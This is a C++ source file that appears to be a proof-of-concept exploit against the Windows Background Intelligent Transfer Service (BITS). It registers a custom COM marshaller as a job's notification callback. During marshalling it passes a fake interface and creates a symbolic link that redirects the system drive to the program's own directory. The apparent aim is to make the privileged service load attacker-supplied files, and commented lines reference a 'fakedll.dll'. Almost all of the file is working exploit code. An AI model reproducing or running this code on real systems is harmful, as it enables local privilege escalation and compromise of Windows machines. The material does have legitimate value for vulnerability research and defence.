// BITSTest.cpp : Defines the entry point for the console application.
//
#include <bits.h>
#include <bits4_0.h>
#include <stdio.h>
#include <tchar.h>
#include <lm.h>
#include <string>
#include <comdef.h>
#include <winternl.h>
#include <Shlwapi.h>
#include <strsafe.h>
#include <vector>

#pragma comment(lib, "shlwapi.lib")

extern "C" void DummyCall();

#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)

extern "C" NTSTATUS NTAPI NtCreateSymbolicLinkObject(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);
extern "C" VOID NTAPI RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);

class ScopedHandle
{
    HANDLE _h;
public:
    ScopedHandle() : _h(nullptr)
    {
    }

    ScopedHandle(ScopedHandle&) = delete;

    ScopedHandle(ScopedHandle&& h) noexcept {
        _h = h._h;
        h._h = nullptr;
    }

    ~ScopedHandle()
    {
        if (!invalid())
        {
            CloseHandle(_h);
            _h = nullptr;
        }
    }

    bool invalid() {
        return (_h == nullptr) || (_h == INVALID_HANDLE_VALUE);
    }

    HANDLE detach()
    {
        HANDLE ret = _h;
        _h = nullptr;
        return ret;
    }

    void set(HANDLE h)
    {
        _h = h;
    }

    HANDLE get()
    {
        return _h;
    }

    HANDLE* ptr()
    {
        return &_h;
    }
};

ScopedHandle CreateSymlink(LPCWSTR linkname, LPCWSTR targetname)
{
    OBJECT_ATTRIBUTES objAttr;
    UNICODE_STRING name;
    UNICODE_STRING target;

    RtlInitUnicodeString(&name, linkname);
    RtlInitUnicodeString(&target, targetname);

    InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);

    ScopedHandle hLink;

    NTSTATUS status = NtCreateSymbolicLinkObject(hLink.ptr(), SYMBOLIC_LINK_ALL_ACCESS, &objAttr, &target);
    if (status == 0)
    {
        printf("Opened Link %ls -> %ls: %p\n", linkname, targetname, hLink.get());
        return hLink;
    }
    else
    {
        printf("Error creating link %ls: %08X\n", linkname, status);
        return ScopedHandle();
    }
}


bstr_t GetSystemDrive()
{
    WCHAR windows_dir[MAX_PATH] = { 0 };

    (void)GetWindowsDirectory(windows_dir, MAX_PATH);

    windows_dir[2] = 0;

    return windows_dir;
}

bstr_t GetDeviceFromPath(LPCWSTR lpPath)
{
    WCHAR drive[3] = { 0 };
    drive[0] = lpPath[0];
    drive[1] = lpPath[1];
    drive[2] = 0;

    WCHAR device_name[MAX_PATH] = { 0 };

    if (QueryDosDevice(drive, device_name, MAX_PATH))
    {
        return device_name;
    }
    else
    {
        printf("Error getting device for %ls\n", lpPath);
        exit(1);
    }
}

bstr_t GetSystemDevice()
{
    return GetDeviceFromPath(GetSystemDrive());
}

bstr_t GetExe(HMODULE hModule = nullptr)
{
    WCHAR curr_path[MAX_PATH] = { 0 };
    GetModuleFileName(hModule, curr_path, MAX_PATH);
    return curr_path;
}

bstr_t GetExeDir(HMODULE hModule = nullptr)
{
    WCHAR curr_path[MAX_PATH] = { 0 };
    GetModuleFileName(hModule, curr_path, MAX_PATH);
    PathRemoveFileSpec(curr_path);

    return curr_path;
}

bstr_t GetCurrentPath()
{
    bstr_t curr_path = GetExeDir();

    bstr_t ret = GetDeviceFromPath(curr_path);

    ret += &curr_path.GetBSTR()[2];

    return ret;
}

static bstr_t IIDToBSTR(REFIID riid)
{
    LPOLESTR str;
    bstr_t ret = "Unknown";
    if (SUCCEEDED(StringFromIID(riid, &str)))
    {
        ret = str;
        CoTaskMemFree(str);
    }
    return ret;
}

GUID CLSID_AggStdMarshal2 = { 0x00000027,0x0000,0x0008,{ 0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 } };

static const IID IID_FakeIID = { 0x016fd94e,0xb02a,0x4ab8,{0x94,0xc6,0x14,0x9f,0xda,0xb5,0x6b,0x8d} };

class CMarshaller : public IMarshal
{
    LONG _ref_count;
    IUnknownPtr _unk;
    ScopedHandle _symlink;

    ~CMarshaller() {}

public:

    CMarshaller(IUnknown* unk) : _ref_count(1)
    {
        _unk = unk;
    }

    virtual HRESULT STDMETHODCALLTYPE QueryInterface(
        /* [in] */ REFIID riid,
        /* [iid_is][out] */ _COM_Outptr_ void __RPC_FAR* __RPC_FAR* ppvObject)
    {
        *ppvObject = nullptr;
        printf("QI - Marshaller: %ls %p\n", IIDToBSTR(riid).GetBSTR(), this);

        if (riid == IID_IUnknown)
        {
            *ppvObject = this;
        }
        else if (riid == IID_IMarshal)
        {
            *ppvObject = static_cast<IMarshal*>(this);
        }
        else
        {
            return E_NOINTERFACE;
        }
        printf("Queried Success: %p\n", *ppvObject);
        ((IUnknown*)*ppvObject)->AddRef();
        return S_OK;
    }

    virtual ULONG STDMETHODCALLTYPE AddRef(void)
    {
        printf("AddRef: %d\n", _ref_count);
        return InterlockedIncrement(&_ref_count);
    }

    virtual ULONG STDMETHODCALLTYPE Release(void)
    {
        printf("Release: %d\n", _ref_count);
        ULONG ret = InterlockedDecrement(&_ref_count);
        if (ret == 0)
        {
            printf("Release object %p\n", this);
            delete this;
        }
        return ret;
    }

    virtual HRESULT STDMETHODCALLTYPE GetUnmarshalClass(
        /* [annotation][in] */
        _In_  REFIID riid,
        /* [annotation][unique][in] */
        _In_opt_  void* pv,
        /* [annotation][in] */
        _In_  DWORD dwDestContext,
        /* [annotation][unique][in] */
        _Reserved_  void* pvDestContext,
        /* [annotation][in] */
        _In_  DWORD mshlflags,
        /* [annotation][out] */
        _Out_  CLSID* pCid)
    {
        *pCid = CLSID_AggStdMarshal2;
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(
        /* [annotation][in] */
        _In_  REFIID riid,
        /* [annotation][unique][in] */
        _In_opt_  void* pv,
        /* [annotation][in] */
        _In_  DWORD dwDestContext,
        /* [annotation][unique][in] */
        _Reserved_  void* pvDestContext,
        /* [annotation][in] */
        _In_  DWORD mshlflags,
        /* [annotation][out] */
        _Out_  DWORD* pSize)
    {
        *pSize = 1024;
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE MarshalInterface(
        /* [annotation][unique][in] */
        _In_  IStream* pStm,
        /* [annotation][in] */
        _In_  REFIID riid,
        /* [annotation][unique][in] */
        _In_opt_  void* pv,
        /* [annotation][in] */
        _In_  DWORD dwDestContext,
        /* [annotation][unique][in] */
        _Reserved_  void* pvDestContext,
        /* [annotation][in] */
        _In_  DWORD mshlflags)
    {
        printf("Marshal Interface: %ls\n", IIDToBSTR(riid).GetBSTR());
        HRESULT hr = E_FAIL;
        IUnknownPtr unk;
        if (riid == __uuidof(IBackgroundCopyCallback2))
        {
            printf("Marshalling fake object\n");
            hr = CoMarshalInterface(pStm, IID_FakeIID, _unk, dwDestContext, pvDestContext, mshlflags);
            _symlink.set(CreateSymlink(L"\\??\\" + GetSystemDrive(), L"\\GLOBAL??\\" + GetExeDir()).detach());
        }
        else
        {
            hr = CoMarshalInterface(pStm, riid, _unk, dwDestContext, pvDestContext, mshlflags);
        }
        printf("Marshal Complete: %08X\n", hr);
        return hr;
    }

    virtual HRESULT STDMETHODCALLTYPE UnmarshalInterface(
        /* [annotation][unique][in] */
        _In_  IStream* pStm,
        /* [annotation][in] */
        _In_  REFIID riid,
        /* [annotation][out] */
        _Outptr_  void** ppv)
    {
        return E_NOTIMPL;
    }

    virtual HRESULT STDMETHODCALLTYPE ReleaseMarshalData(
        /* [annotation][unique][in] */
        _In_  IStream* pStm)
    {
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE DisconnectObject(
        /* [annotation][in] */
        _In_  DWORD dwReserved)
    {
        return S_OK;
    }
};

class FakeObject : public IBackgroundCopyCallback2, public IPersist
{
    LONG m_lRefCount;

    ~FakeObject() {};

public:
    //Constructor, Destructor
    FakeObject() {
        m_lRefCount = 1;
    }

    //IUnknown
    HRESULT __stdcall QueryInterface(REFIID riid, LPVOID* ppvObj)
    {
        if (riid == __uuidof(IUnknown))
        {
            printf("Query for IUnknown\n");
            *ppvObj = this;
        }
        else if (riid == __uuidof(IBackgroundCopyCallback2))
        {
            printf("Query for IBackgroundCopyCallback2\n");
            *ppvObj = static_cast<IBackgroundCopyCallback2*>(this);
        }
        else if (riid == __uuidof(IBackgroundCopyCallback))
        {
            printf("Query for IBackgroundCopyCallback\n");
            *ppvObj = static_cast<IBackgroundCopyCallback*>(this);
        }
        else if (riid == __uuidof(IPersist))
        {
            printf("Query for IPersist\n");
            *ppvObj = static_cast<IPersist*>(this);
        }
        else if (riid == IID_FakeIID)
        {
            printf("QUery for FakeIID\n");
            *ppvObj = this;
        }
        else
        {
            printf("Unknown IID: %ls %p\n", IIDToBSTR(riid).GetBSTR(), this);
            *ppvObj = NULL;
            return E_NOINTERFACE;
        }

        ((IUnknown*)*ppvObj)->AddRef();
        return NOERROR;
    }

    ULONG __stdcall AddRef()
    {
        return InterlockedIncrement(&m_lRefCount);
    }

    ULONG __stdcall Release()
    {
        ULONG  ulCount = InterlockedDecrement(&m_lRefCount);

        if (0 == ulCount)
        {
            delete this;
        }

        return ulCount;
    }

    virtual HRESULT STDMETHODCALLTYPE JobTransferred(
        /* [in] */ __RPC__in_opt IBackgroundCopyJob* pJob)
    {
        printf("JobTransferred\n");
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE JobError(
        /* [in] */ __RPC__in_opt IBackgroundCopyJob* pJob,
        /* [in] */ __RPC__in_opt IBackgroundCopyError* pError)
    {
        printf("JobError\n");
        return S_OK;
    }


    virtual HRESULT STDMETHODCALLTYPE JobModification(
        /* [in] */ __RPC__in_opt IBackgroundCopyJob* pJob,
        /* [in] */ DWORD dwReserved)
    {
        printf("JobModification\n");
        return S_OK;
    }


    virtual HRESULT STDMETHODCALLTYPE FileTransferred(
        /* [in] */ __RPC__in_opt IBackgroundCopyJob* pJob,
        /* [in] */ __RPC__in_opt IBackgroundCopyFile* pFile)
    {
        printf("FileTransferred\n");
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE GetClassID(
        /* [out] */ __RPC__out CLSID* pClassID)
    {
        *pClassID = GUID_NULL;
        return S_OK;
    }
};

_COM_SMARTPTR_TYPEDEF(IBackgroundCopyJob, __uuidof(IBackgroundCopyJob));
_COM_SMARTPTR_TYPEDEF(IBackgroundCopyManager, __uuidof(IBackgroundCopyManager));

static HRESULT Check(HRESULT hr)
{
    if (FAILED(hr))
    {
        throw _com_error(hr);
    }
    return hr;
}

void TestBits()
{
    IBackgroundCopyManagerPtr pQueueMgr;

    Check(CoCreateInstance(__uuidof(BackgroundCopyManager), NULL,
        CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pQueueMgr)));

    IUnknownPtr pOuter = new CMarshaller(static_cast<IPersist*>(new FakeObject()));
    IUnknownPtr pInner;

    Check(CoGetStdMarshalEx(pOuter, SMEXF_SERVER, &pInner));

    IBackgroundCopyJobPtr pJob;
    GUID guidJob;
    Check(pQueueMgr->CreateJob(L"BitsAuthSample",
        BG_JOB_TYPE_DOWNLOAD,
        &guidJob,
        &pJob));

    IUnknownPtr pNotify;
    pNotify.Attach(new CMarshaller(pInner));
    printf("Result: %08X\n", pJob->SetNotifyInterface(pNotify));
    if (pJob)
    {
        pJob->Cancel();
    }
    printf("Done\n");
}

class CoInit
{
public:
    CoInit()
    {
        Check(CoInitialize(nullptr));
        Check(CoInitializeSecurity(nullptr, -1, nullptr, nullptr,
            RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_NO_CUSTOM_MARSHAL | EOAC_DYNAMIC_CLOAKING, nullptr));
    }

    ~CoInit()
    {
        CoUninitialize();
    }
};

int wmain(int argc, wchar_t** argv)
{
    try
    {
        //HMODULE hMod = LoadLibrary(L"fakedll.dll");
        //HMODULE hMod = LoadLibrary(L"comctl32.dll");
        //printf("%ls\n", GetExeDir(hMod).GetBSTR());
        //printf("%ls\n", GetCurrentPath().GetBSTR());

        CoInit ci;
        TestBits();
    }
    catch (const _com_error& err)
    {
        printf("Error: %ls\n", err.ErrorMessage());
    }

    return 0;
}